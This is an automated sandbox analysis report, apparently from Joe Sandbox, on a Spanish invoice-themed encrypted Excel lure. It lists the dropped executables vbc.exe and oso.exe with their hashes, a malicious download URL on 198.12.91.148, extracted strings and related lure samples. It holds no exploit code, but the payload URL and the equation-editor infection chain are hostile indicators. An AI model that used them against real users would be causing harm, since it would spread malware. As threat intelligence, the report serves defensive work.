
                NameSourceMaliciousAntivirus DetectionReputation
                http://pcLwYQ.comvbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://127.0.0.1:HTTP/1.1vbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://DynDns.comDynDNSvbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.%s.comPAvbc.exe, 00000007.00000002.2365402935.0000000005E10000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                low
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000007.00000002.2365402935.0000000005E10000.00000002.00000001.sdmpfalse
                  high
                  http://twitter.com/statuses/user_timeline.xml?screen_name=vbc.exe, vbc.exe, 00000007.00000002.2364130340.0000000000EC2000.00000020.00020000.sdmp, oso[1].exe.4.drfalse
                    high
                    http://www.day.com/dam/1.069CBECC2.emf.0.drfalse
                      high
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%havbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://api.twitter.com/1/direct_messages.xml?since_id=vbc.exe, vbc.exe, 00000007.00000002.2364130340.0000000000EC2000.00000020.00020000.sdmp, oso[1].exe.4.drfalse
                        high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        198.12.91.148
                        unknownUnited States
                        36352AS-COLOCROSSINGUStrue

                        General Information

                        Joe Sandbox Version:33.0.0 White Diamond
                        Analysis ID:452698
                        Start date:22.07.2021
                        Start time:18:17:10
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 56s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:FACTURA 3879843.xlsx
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:2
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.winXLSX@6/13@0/1
                        EGA Information:Failed
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 33
                        • Number of non-executed functions: 1
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .xlsx
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        18:18:07API Interceptor88x Sleep call for process: EQNEDT32.EXE modified
                        18:18:11API Interceptor884x Sleep call for process: vbc.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        198.12.91.148FACTURAS PENDIENTES 3782#.xlsxGet hashmaliciousBrowse
                        • 198.12.91.148/can.exe
                        DHL 932864790.xlsxGet hashmaliciousBrowse
                        • 198.12.91.148/man.exe

                        Domains

                        No context

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        AS-COLOCROSSINGUS6HAisf3waNGet hashmaliciousBrowse
                        • 23.236.181.202
                        Swift-Payment_Details.xlsxGet hashmaliciousBrowse
                        • 192.210.173.40
                        PO20210722.xlsxGet hashmaliciousBrowse
                        • 172.245.119.43
                        USD_SLIP.docxGet hashmaliciousBrowse
                        • 198.46.132.159
                        o3ZUDIEL1vGet hashmaliciousBrowse
                        • 107.173.85.99
                        Invoice.xlsxGet hashmaliciousBrowse
                        • 198.12.81.125
                        BANKINV19072021LIMCA.xlsxGet hashmaliciousBrowse
                        • 192.227.129.35
                        aJw19xLGjcGet hashmaliciousBrowse
                        • 107.172.196.205
                        uqZ7bBFvVLGet hashmaliciousBrowse
                        • 107.172.196.205
                        9J7OaHH7ObGet hashmaliciousBrowse
                        • 107.172.196.205
                        QbdydvqPuuGet hashmaliciousBrowse
                        • 107.172.196.205
                        sphost.exeGet hashmaliciousBrowse
                        • 172.245.186.101
                        _VM_1064855583.HtMGet hashmaliciousBrowse
                        • 75.127.11.55
                        Inv-04_PDF.vbsGet hashmaliciousBrowse
                        • 192.227.128.168
                        Dvf7OP92yJGet hashmaliciousBrowse
                        • 104.170.143.71
                        PURCHASE ORDER 72021.xlsxGet hashmaliciousBrowse
                        • 198.12.81.125
                        Order Request for Quotation.xlsxGet hashmaliciousBrowse
                        • 198.12.91.134
                        Quotaton.xlsxGet hashmaliciousBrowse
                        • 198.12.81.125
                        SWIFT MESSAGE DETAILS.xlsxGet hashmaliciousBrowse
                        • 192.210.173.40
                        PI.xlsxGet hashmaliciousBrowse
                        • 198.23.207.48

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exe
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:downloaded
                        Size (bytes):1021952
                        Entropy (8bit):7.259067983893984
                        Encrypted:false
                        SSDEEP:12288:gBKH67/6J5DhLI7/Hc6m60hVaIQNSef8IkyrA8Iz/syaUVKnpL7INeLc:gBJ63VUiXhIPSClkSAjzahpgNeLc
                        MD5:E8194372570D57749B3033E063BDC5D8
                        SHA1:50C6AB11638DBF4428767359BFA824A12022D7DC
                        SHA-256:5E6C4E2ABF28FE57B881DC7751FE2422D5515232C93F3049276607CBC01AC74F
                        SHA-512:73B360EC191DBC7A048021696ABEFC74EDDBFD8DB0B622EA5CB8A1D275792C42DDED1E7577352F5C02FCEB343D1550FF389626DA63467A8B579B77816CF48981
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Reputation:low
                        IE Cache URL:http://198.12.91.148/oso.exe
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+..`.................2...b.......Q... ...`....@.. ....................................@..................................P..K........]........................................................................... ............... ..H............text...41... ...2.................. ..`.sdata.......`.......6..............@....rsrc....].......^...8..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A2F8885.emf
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):7608
                        Entropy (8bit):5.086576227479567
                        Encrypted:false
                        SSDEEP:96:+SwrLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5wA+sW31RGtdVDYM3VfmkpH
                        MD5:1ED4B40E04D22D709A03B25997BD507E
                        SHA1:01176038331214422A0009B8C00BCCC39EB3DACC
                        SHA-256:8DAFCB076D4B82B4F83ADCB56C61EDC5FEF22ACDCEA454B9EFABF31D51D0045E
                        SHA-512:975E373704460F0D6109237D1D46AA5266FED6F3435602D9938045C9C8A6C7766D7AB8682F9D99E7C2833181EFF11A1B421F3DC890ED6901EB700674ED3E0BC9
                        Malicious:false
                        Reputation:low
                        Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I................................................... .6.).X.......d.....................^...^....p....\.....^.......^.<.^....p......^..6Pv...p....`..pp. .$y.v.S............^....v....$.....J.d.......t.^..^.p.....^.pPD...S...l......-...$.^..<.v................<.>v.Z.v....X.2p....p. ........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\53902E5A.png
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):94963
                        Entropy (8bit):7.9700481154985985
                        Encrypted:false
                        SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                        MD5:17EC925977BED2836071429D7B476809
                        SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                        SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                        SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\593E6A20.jpeg
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                        Category:dropped
                        Size (bytes):62140
                        Entropy (8bit):7.529847875703774
                        Encrypted:false
                        SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                        MD5:722C1BE1697CFCEAE7BDEFB463265578
                        SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                        SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                        SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\69CBECC2.emf
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):648132
                        Entropy (8bit):2.812391839617042
                        Encrypted:false
                        SSDEEP:3072:d34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:94UcLe0JOcXuunhqcS
                        MD5:B04EDAAE667522159F7332DBF52C609F
                        SHA1:D73B3F6111E6B33EBF03368CB203FBAB0A37706E
                        SHA-256:54D0E8AF520AF56D739B814816190A27847150A8D3EA870A4A9145A4B8F7B699
                        SHA-512:B404B405FF03619D73AD0281F8B7A4E07C101E261C52EB09E4795F7DE08AB0B465FF51E2B57804094C2C671FA5EE0380100E11E189CF3670B4F413EFCCEE1BF4
                        Malicious:false
                        Reputation:low
                        Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................z$...l..-z.z.@..%...H............p...NqP..........X......NqP...... ....y.z...... .........(..z.z............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........|..X...............(....vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F70F52E.png
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):94963
                        Entropy (8bit):7.9700481154985985
                        Encrypted:false
                        SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                        MD5:17EC925977BED2836071429D7B476809
                        SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                        SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                        SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                        Malicious:false
                        Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BEAC757.jpeg
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                        Category:dropped
                        Size (bytes):85020
                        Entropy (8bit):7.2472785111025875
                        Encrypted:false
                        SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                        MD5:738BDB90A9D8929A5FB2D06775F3336F
                        SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                        SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                        SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                        Malicious:false
                        Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9C2427D.png
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):11303
                        Entropy (8bit):7.909402464702408
                        Encrypted:false
                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                        Malicious:false
                        Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEA251DB.jpeg
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                        Category:dropped
                        Size (bytes):85020
                        Entropy (8bit):7.2472785111025875
                        Encrypted:false
                        SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                        MD5:738BDB90A9D8929A5FB2D06775F3336F
                        SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                        SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                        SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                        Malicious:false
                        Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C39423A1.png
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):11303
                        Entropy (8bit):7.909402464702408
                        Encrypted:false
                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                        Malicious:false
                        Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EDD7C96C.jpeg
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                        Category:dropped
                        Size (bytes):62140
                        Entropy (8bit):7.529847875703774
                        Encrypted:false
                        SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                        MD5:722C1BE1697CFCEAE7BDEFB463265578
                        SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                        SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                        SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                        Malicious:false
                        Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\Desktop\~$FACTURA 3879843.xlsx
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):330
                        Entropy (8bit):1.4377382811115937
                        Encrypted:false
                        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                        MD5:96114D75E30EBD26B572C1FC83D1D02E
                        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                        Malicious:true
                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        C:\Users\Public\vbc.exe
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1021952
                        Entropy (8bit):7.259067983893984
                        Encrypted:false
                        SSDEEP:12288:gBKH67/6J5DhLI7/Hc6m60hVaIQNSef8IkyrA8Iz/syaUVKnpL7INeLc:gBJ63VUiXhIPSClkSAjzahpgNeLc
                        MD5:E8194372570D57749B3033E063BDC5D8
                        SHA1:50C6AB11638DBF4428767359BFA824A12022D7DC
                        SHA-256:5E6C4E2ABF28FE57B881DC7751FE2422D5515232C93F3049276607CBC01AC74F
                        SHA-512:73B360EC191DBC7A048021696ABEFC74EDDBFD8DB0B622EA5CB8A1D275792C42DDED1E7577352F5C02FCEB343D1550FF389626DA63467A8B579B77816CF48981
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+..`.................2...b.......Q... ...`....@.. ....................................@..................................P..K........]........................................................................... ............... ..H............text...41... ...2.................. ..`.sdata.......`.......6..............@....rsrc....].......^...8..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:CDFV2 Encrypted
                        Entropy (8bit):7.994232412140433
                        TrID:
                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                        File name:FACTURA 3879843.xlsx
                        File size:1227776
                        MD5:9ae3b1aa2c80f4e12e33569d7b5839df
                        SHA1:8579f018a10f93cedbb73369fb8c7b66416d9846
                        SHA256:82737660638921bf4d3e82bf4c059ec3cb0b61bd988365572bd4207b87ceb060
                        SHA512:365e321efdcc8d3bfaa5d239ab31b88a21fb446382ac263d06aeeafc616999ebd37fcdc97a8c48d1f9e8b9338d719abdcfe7e96b6320cc4b9b361af84ce34928
                        SSDEEP:24576:oi5w8rke62kK0gdD6kAM41j3qU87qnaF9YEof0lm1BTY29zn1nclKd:oCwi62kK0gZ6D1jDA9YIl+NT1Dd
                        File Content Preview:........................>.......................................................................................................|.......~......................................................................................................................

                        File Icon

                        Icon Hash:e4e2aa8aa4b4bcb4

                        Static OLE Info

                        General

                        Document Type:OLE
                        Number of OLE Files:1

                        OLE File "FACTURA 3879843.xlsx"

                        Indicators

                        Has Summary Info:False
                        Application Name:unknown
                        Encrypted Document:True
                        Contains Word Document Stream:False
                        Contains Workbook/Book Stream:False
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:
                        Flash Objects Count:
                        Contains VBA Macros:False

                        Streams

                        Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                        General
                        Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                        File Type:data
                        Stream Size:64
                        Entropy:2.73637206947
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                        Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
